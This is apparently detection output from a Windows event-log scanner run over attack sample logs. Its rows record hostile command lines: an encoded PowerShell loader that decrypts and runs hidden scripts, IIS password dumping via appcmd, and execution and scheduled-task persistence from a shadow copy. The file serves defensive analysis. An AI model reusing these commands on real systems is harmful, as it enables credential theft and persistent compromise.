+2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir "". )"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir "". )"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  /groups   :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume""   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin  List Shadows  :  Path: C:\Windows\System32\vssadmin.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find  ""Shadow Copy Volume""   :  Path: C:\Windows\System32\find.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe  process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe   :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe  :  Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: C:\Windows\system32\schtasks.exe  /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe""   :  Path: C:\Windows\System32\schtasks.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe  -nw -exec=c:\windows\System32\osk.exe c:\  :  Path: C:\ProgramData\vshadow.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM  :  Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590""  :  Path: C:\Windows\System32\drvinst.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: IEWIN7\IEUser  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe  -nw -exec=c:\windows\System32\notepad.exe c:\  :  Path: C:\ProgramData\vshadow.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM  :  Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0""  :  Path: C:\Windows\System32\drvinst.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: vshadow.exe  -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe""   :  Path: C:\Users\IEUser\Downloads\a.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe""  :  Path: C:\Users\IEUser\Downloads\a.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp""  :  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
